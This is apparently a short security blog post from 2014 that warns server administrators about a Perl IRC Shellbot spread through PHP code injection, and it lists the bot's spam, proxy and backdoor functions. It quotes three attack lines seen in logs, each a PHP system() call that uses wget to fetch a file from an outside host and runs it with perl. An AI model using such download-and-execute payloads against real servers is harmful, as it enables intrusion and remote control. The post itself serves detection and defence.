“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently You maybe saw strange input in server logs…

Something like:

<?php system(“wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

 

What does that mean? Well, first of all, Your server potentially vulnerable to the  PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes, that run from /tmp/ folder and with default Apache user.  If there are – You’ve been infected. Take care of it

Now, how exactly this stuff looks like?

Header:

 

header

VT sample, in case You curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s IRC Server-oriented bot, with the main capability to SPAM. Language looks like Portuguese- Brazilian?

It also seen in wild since 2012, at least, Google said 🙂 But older versions had less functionality. And now it back 🙂

That’s how it behave:

1. Script connect to IRC server, protected with credentials [unfortunately, it not available now]

2. Fetch list of the mails, names and addresses for replies from embedded URLs, compose the mail messages and send them in behalf of Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and  execution

And, since fun is everything in the malware hunting:

One of functions:

func

🙂 he\she is so exited 🙂

It’s not new player on this game field, but recently he\she back in business, so please be aware.

Well, review Your logs and\or update me, in case You have some additional info.

Stay safe

D.L.

Tags :